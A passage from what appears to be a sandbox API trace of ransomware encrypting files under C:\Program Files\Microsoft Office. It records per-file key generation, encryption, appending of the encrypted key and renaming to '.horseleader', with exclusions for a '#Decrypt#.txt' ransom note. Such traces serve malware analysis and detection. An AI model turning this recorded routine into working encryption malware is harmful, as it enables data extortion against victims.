1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0252.283] WriteFile (in: hFile=0x164, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0252.283] CloseHandle (hObject=0x164) returned 1 [0252.283] GetProcessHeap () returned 0x780000 [0252.283] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0252.283] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x512f1610, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0252.283] lstrcmpiW (lpString1="Microsoft Office", lpString2="Windows") returned -1 [0252.284] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office") returned 37 [0252.284] lstrcmpW (lpString1="Microsoft Office", lpString2=".") returned 1 [0252.284] lstrcmpW (lpString1="Microsoft Office", lpString2="..") returned 1 [0252.284] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Microsoft Office", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.284] GetProcessHeap () returned 0x780000 [0252.284] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0252.284] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\*") returned 39 [0252.284] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x512f1610, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0252.284] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.284] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\.") returned 39 [0252.284] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.284] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x512f1610, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0252.284] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.284] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\..") returned 40 [0252.285] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.285] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.285] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="CLIPART", cAlternateFileName="")) returned 1 [0252.285] lstrcmpiW (lpString1="CLIPART", lpString2="Windows") returned -1 [0252.285] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART") returned 45 [0252.285] lstrcmpW (lpString1="CLIPART", lpString2=".") returned 1 [0252.285] lstrcmpW (lpString1="CLIPART", lpString2="..") returned 1 [0252.285] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.285] GetProcessHeap () returned 0x780000 [0252.285] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0252.285] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\*") returned 47 [0252.285] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0252.286] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.286] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\.") returned 47 [0252.287] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.287] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0252.287] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.287] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\..") returned 48 [0252.287] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.287] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.287] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7090d6b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PUB60COR", cAlternateFileName="")) returned 1 [0252.287] lstrcmpiW (lpString1="PUB60COR", lpString2="Windows") returned -1 [0252.287] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 54 [0252.287] lstrcmpW (lpString1="PUB60COR", lpString2=".") returned 1 [0252.287] lstrcmpW (lpString1="PUB60COR", lpString2="..") returned 1 [0252.287] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.287] GetProcessHeap () returned 0x780000 [0252.287] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79b628 [0252.287] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*") returned 56 [0252.287] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7090d6b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0252.290] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.290] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\.") returned 56 [0252.291] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.291] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7090d6b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0252.292] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.292] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\..") returned 57 [0252.292] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.292] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.292] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54952c00, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54952c00, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x2340, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00004_.GIF", cAlternateFileName="")) returned 1 [0252.292] lstrcmpiW (lpString1="AG00004_.GIF", lpString2="Windows") returned -1 [0252.292] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 67 [0252.292] StrStrIW (lpFirst="AG00004_.GIF", lpSrch=".horseleader") returned 0x0 [0252.292] lstrcmpW (lpString1="AG00004_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.292] lstrcmpW (lpString1="AG00004_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.292] lstrlenW (lpString=".testttjffg") returned 11 [0252.292] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.292] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.292] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.293] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.293] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 67 [0252.293] StrStrW (lpFirst="AG00004_.GIF", lpSrch=".txt") returned 0x0 [0252.294] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9024) returned 1 [0252.294] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2340, lpOverlapped=0x0) returned 1 [0252.299] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdcc0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.299] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2340, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2340, lpOverlapped=0x0) returned 1 [0252.299] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.299] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.299] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.299] CloseHandle (hObject=0x158) returned 1 [0252.300] GetProcessHeap () returned 0x780000 [0252.300] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.300] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.horseleader") returned 79 [0252.300] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif.horseleader")) returned 1 [0252.301] GetProcessHeap () returned 0x780000 [0252.301] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.301] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83130700, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x83130700, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x1c30, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00011_.GIF", cAlternateFileName="")) returned 1 [0252.301] lstrcmpiW (lpString1="AG00011_.GIF", lpString2="Windows") returned -1 [0252.301] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 67 [0252.301] StrStrIW (lpFirst="AG00011_.GIF", lpSrch=".horseleader") returned 0x0 [0252.301] lstrcmpW (lpString1="AG00011_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.301] lstrcmpW (lpString1="AG00011_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.301] lstrlenW (lpString=".testttjffg") returned 11 [0252.301] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.301] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.301] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.301] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.302] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 67 [0252.302] StrStrW (lpFirst="AG00011_.GIF", lpSrch=".txt") returned 0x0 [0252.302] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7216) returned 1 [0252.302] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1c30, lpOverlapped=0x0) returned 1 [0252.304] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe3d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.304] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1c30, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1c30, lpOverlapped=0x0) returned 1 [0252.305] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.305] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.305] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.305] CloseHandle (hObject=0x158) returned 1 [0252.305] GetProcessHeap () returned 0x780000 [0252.305] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.305] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.horseleader") returned 79 [0252.305] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif.horseleader")) returned 1 [0252.306] GetProcessHeap () returned 0x780000 [0252.306] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.306] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78587200, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78587200, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x3a19, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00021_.GIF", cAlternateFileName="")) returned 1 [0252.306] lstrcmpiW (lpString1="AG00021_.GIF", lpString2="Windows") returned -1 [0252.306] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 67 [0252.306] StrStrIW (lpFirst="AG00021_.GIF", lpSrch=".horseleader") returned 0x0 [0252.306] lstrcmpW (lpString1="AG00021_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.307] lstrcmpW (lpString1="AG00021_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.307] lstrlenW (lpString=".testttjffg") returned 11 [0252.307] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.307] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.307] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.307] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.308] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 67 [0252.308] StrStrW (lpFirst="AG00021_.GIF", lpSrch=".txt") returned 0x0 [0252.308] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=14873) returned 1 [0252.308] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3a19, lpOverlapped=0x0) returned 1 [0252.311] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc5e7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.312] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3a19, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3a19, lpOverlapped=0x0) returned 1 [0252.312] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.312] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.312] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.312] CloseHandle (hObject=0x158) returned 1 [0252.312] GetProcessHeap () returned 0x780000 [0252.313] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.313] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.horseleader") returned 79 [0252.313] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif.horseleader")) returned 1 [0252.314] GetProcessHeap () returned 0x780000 [0252.314] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.314] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64147500, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x64147500, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x1a1c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00037_.GIF", cAlternateFileName="")) returned 1 [0252.314] lstrcmpiW (lpString1="AG00037_.GIF", lpString2="Windows") returned -1 [0252.314] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 67 [0252.314] StrStrIW (lpFirst="AG00037_.GIF", lpSrch=".horseleader") returned 0x0 [0252.314] lstrcmpW (lpString1="AG00037_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.314] lstrcmpW (lpString1="AG00037_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.314] lstrlenW (lpString=".testttjffg") returned 11 [0252.314] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.314] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.315] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.315] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 